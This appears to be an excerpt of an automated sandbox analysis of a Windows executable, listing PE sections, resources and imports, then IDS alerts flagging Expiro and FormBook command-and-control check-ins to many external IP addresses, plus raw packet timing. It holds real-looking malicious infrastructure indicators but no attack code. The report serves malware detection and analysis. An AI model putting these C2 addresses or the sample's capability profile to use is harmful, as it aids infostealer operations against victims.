IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | 3090a3327bcf1f126c5c7f9e4891301c | False | 0.5728679102422908 | data | 6.676131091367248 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x5f9e8 | 0x5fa00 | 21019439c6f49fdb7d0a6674460d86eb | False | 0.9315512663398693 | data | 7.901922834254712 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x127000 | 0x96000 | 0x95000 | 8797384e48bfe3e35b4e2097f46a7bcb | False | 0.9757530673238255 | data | 7.938061157054464 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x56cad | data | | | 1.0003263000666665
RT_GROUP_ICON | 0x126468 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x1264e0 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1264f4 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x126508 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x12651c | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1265f8 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T03:29:01.710695+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 54.244.188.177 | 80 | 192.168.2.8 | 49705 | TCP
2025-01-11T03:29:01.710695+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 54.244.188.177 | 80 | 192.168.2.8 | 49705 | TCP
2025-01-11T03:29:02.139160+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.8 | 49706 | 18.141.10.107 | 80 | TCP
2025-01-11T03:29:38.153479+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49711 | 161.97.142.144 | 80 | TCP
2025-01-11T03:29:38.153479+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49711 | 161.97.142.144 | 80 | TCP
2025-01-11T03:29:54.604282+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49713 | 23.225.160.132 | 80 | TCP
2025-01-11T03:29:57.198005+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49714 | 23.225.160.132 | 80 | TCP
2025-01-11T03:29:59.729424+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49715 | 23.225.160.132 | 80 | TCP
2025-01-11T03:30:02.244910+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49716 | 23.225.160.132 | 80 | TCP
2025-01-11T03:30:02.244910+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49716 | 23.225.160.132 | 80 | TCP
2025-01-11T03:30:09.276305+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49717 | 149.88.81.190 | 80 | TCP
2025-01-11T03:30:11.823282+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49718 | 149.88.81.190 | 80 | TCP
2025-01-11T03:30:14.370041+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49719 | 149.88.81.190 | 80 | TCP
2025-01-11T03:30:36.774129+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49720 | 149.88.81.190 | 80 | TCP
2025-01-11T03:30:36.774129+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49720 | 149.88.81.190 | 80 | TCP
2025-01-11T03:30:43.409205+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49723 | 85.159.66.93 | 80 | TCP
2025-01-11T03:30:45.950346+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49724 | 85.159.66.93 | 80 | TCP
2025-01-11T03:30:48.520763+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49725 | 85.159.66.93 | 80 | TCP
2025-01-11T03:31:50.256479+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49726 | 85.159.66.93 | 80 | TCP
2025-01-11T03:31:50.256479+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49726 | 85.159.66.93 | 80 | TCP
2025-01-11T03:31:55.939008+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49727 | 185.27.134.144 | 80 | TCP
2025-01-11T03:31:58.520385+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49728 | 185.27.134.144 | 80 | TCP
2025-01-11T03:32:01.061440+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49729 | 185.27.134.144 | 80 | TCP
2025-01-11T03:32:03.584409+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49730 | 185.27.134.144 | 80 | TCP
2025-01-11T03:32:03.584409+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49730 | 185.27.134.144 | 80 | TCP
2025-01-11T03:32:09.561620+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49731 | 104.21.95.160 | 80 | TCP
2025-01-11T03:32:12.141540+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49732 | 104.21.95.160 | 80 | TCP
2025-01-11T03:32:14.684573+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49733 | 104.21.95.160 | 80 | TCP
2025-01-11T03:32:17.220453+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49734 | 104.21.95.160 | 80 | TCP
2025-01-11T03:32:17.220453+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49734 | 104.21.95.160 | 80 | TCP
2025-01-11T03:32:23.035066+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49735 | 188.114.97.3 | 80 | TCP
2025-01-11T03:32:25.594023+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49736 | 188.114.97.3 | 80 | TCP
2025-01-11T03:32:28.125662+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49737 | 188.114.97.3 | 80 | TCP
2025-01-11T03:32:30.684068+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49738 | 188.114.97.3 | 80 | TCP
2025-01-11T03:32:30.684068+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49738 | 188.114.97.3 | 80 | TCP
2025-01-11T03:32:36.631692+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49739 | 154.88.22.101 | 80 | TCP
2025-01-11T03:32:39.172598+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49740 | 154.88.22.101 | 80 | TCP
2025-01-11T03:32:41.713395+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49741 | 154.88.22.101 | 80 | TCP
2025-01-11T03:32:44.250506+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49742 | 154.88.22.101 | 80 | TCP
2025-01-11T03:32:44.250506+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49742 | 154.88.22.101 | 80 | TCP
2025-01-11T03:32:49.867503+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49743 | 209.74.77.107 | 80 | TCP
2025-01-11T03:32:52.445463+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49744 | 209.74.77.107 | 80 | TCP
2025-01-11T03:32:55.026836+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49745 | 209.74.77.107 | 80 | TCP
2025-01-11T03:32:57.547399+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49746 | 209.74.77.107 | 80 | TCP
2025-01-11T03:32:57.547399+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49746 | 209.74.77.107 | 80 | TCP
2025-01-11T03:33:11.862420+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49747 | 104.21.48.1 | 80 | TCP
2025-01-11T03:33:14.400430+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49748 | 104.21.48.1 | 80 | TCP
2025-01-11T03:33:16.953921+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49749 | 104.21.48.1 | 80 | TCP
2025-01-11T03:33:19.491866+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49750 | 104.21.48.1 | 80 | TCP
2025-01-11T03:33:19.491866+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49750 | 104.21.48.1 | 80 | TCP
2025-01-11T03:33:27.895923+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49751 | 20.2.249.7 | 80 | TCP
2025-01-11T03:33:30.440328+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49752 | 20.2.249.7 | 80 | TCP
2025-01-11T03:33:32.975054+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49753 | 20.2.249.7 | 80 | TCP
2025-01-11T03:33:35.521212+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49754 | 20.2.249.7 | 80 | TCP
2025-01-11T03:33:35.521212+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49754 | 20.2.249.7 | 80 | TCP
2025-01-11T03:33:41.767203+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49755 | 156.251.17.224 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 03:29:00.693599939 CET | 49705 | 80 | 192.168.2.8 | 54.244.188.177
Jan 11, 2025 03:29:00.698594093 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.8
Jan 11, 2025 03:29:00.698685884 CET | 49705 | 80 | 192.168.2.8 | 54.244.188.177
Jan 11, 2025 03:29:00.699383974 CET | 49705 | 80 | 192.168.2.8 | 54.244.188.177
Jan 11, 2025 03:29:00.699383974 CET | 49705 | 80 | 192.168.2.8 | 54.244.188.177
Jan 11, 2025 03:29:00.704241037 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.8
Jan 11, 2025 03:29:00.704255104 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.8
Jan 11, 2025 03:29:01.402398109 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.8
Jan 11, 2025 03:29:01.402498007 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.8
Jan 11, 2025 03:29:01.402777910 CET | 49705 | 80 | 192.168.2.8 | 54.244.188.177
Jan 11, 2025 03:29:01.705796957 CET | 49705 | 80 | 192.168.2.8 | 54.244.188.177
Jan 11, 2025 03:29:01.710695028 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.8
Jan 11, 2025 03:29:01.823972940 CET | 49706 | 80 | 192.168.2.8 | 18.141.10.107
Jan 11, 2025 03:29:01.828857899 CET | 80 | 49706 | 18.141.10.107 | 192.168.2.8
Jan 11, 2025 03:29:01.828938007 CET | 49706 | 80 | 192.168.2.8 | 18.141.10.107
Jan 11, 2025 03:29:01.829313040 CET | 49706 | 80 | 192.168.2.8 | 18.141.10.107
Jan 11, 2025 03:29:01.829334974 CET | 49706 | 80 | 192.168.2.8 | 18.141.10.107
Jan 11, 2025 03:29:01.834198952 CET | 80 | 49706 | 18.141.10.107 | 192.168.2.8
Jan 11, 2025 03:29:01.834212065 CET | 80 | 49706 | 18.141.10.107 | 192.168.2.8
Jan 11, 2025 03:29:02.139159918 CET | 49706 | 80 | 192.168.2.8 | 18.141.10.107
Jan 11, 2025 03:29:37.537672997 CET | 49711 | 80 | 192.168.2.8 | 161.97.142.144
Jan 11, 2025 03:29:37.542545080 CET | 80 | 49711 | 161.97.142.144 | 192.168.2.8
Jan 11, 2025 03:29:37.542669058 CET | 49711 | 80 | 192.168.2.8 | 161.97.142.144
Jan 11, 2025 03:29:37.553262949 CET | 49711 | 80 | 192.168.2.8 | 161.97.142.144
Jan 11, 2025 03:29:37.559377909 CET | 80 | 49711 | 161.97.142.144 | 192.168.2.8
Jan 11, 2025 03:29:38.153275967 CET | 80 | 49711 | 161.97.142.144 | 192.168.2.8
Jan 11, 2025 03:29:38.153337002 CET | 80 | 49711 | 161.97.142.144 | 192.168.2.8
Jan 11, 2025 03:29:38.153345108 CET | 80 | 49711 | 161.97.142.144 | 192.168.2.8
Jan 11, 2025 03:29:38.153469086 CET | 80 | 49711 | 161.97.142.144 | 192.168.2.8
Jan 11, 2025 03:29:38.153479099 CET | 49711 | 80 | 192.168.2.8 | 161.97.142.144
Jan 11, 2025 03:29:38.153481007 CET | 80 | 49711 | 161.97.142.144 | 192.168.2.8
Jan 11, 2025 03:29:38.153531075 CET | 49711 | 80 | 192.168.2.8 | 161.97.142.144
Jan 11, 2025 03:29:38.159544945 CET | 49711 | 80 | 192.168.2.8 | 161.97.142.144
Jan 11, 2025 03:29:38.164817095 CET | 80 | 49711 | 161.97.142.144 | 192.168.2.8
Jan 11, 2025 03:29:54.044404984 CET | 49713 | 80 | 192.168.2.8 | 23.225.160.132
Jan 11, 2025 03:29:54.049226046 CET | 80 | 49713 | 23.225.160.132 | 192.168.2.8
Jan 11, 2025 03:29:54.049303055 CET | 49713 | 80 | 192.168.2.8 | 23.225.160.132
Jan 11, 2025 03:29:54.070013046 CET | 49713 | 80 | 192.168.2.8 | 23.225.160.132
Jan 11, 2025 03:29:54.074827909 CET | 80 | 49713 | 23.225.160.132 | 192.168.2.8
Jan 11, 2025 03:29:54.559122086 CET | 80 | 49713 | 23.225.160.132 | 192.168.2.8
Jan 11, 2025 03:29:54.604281902 CET | 49713 | 80 | 192.168.2.8 | 23.225.160.132
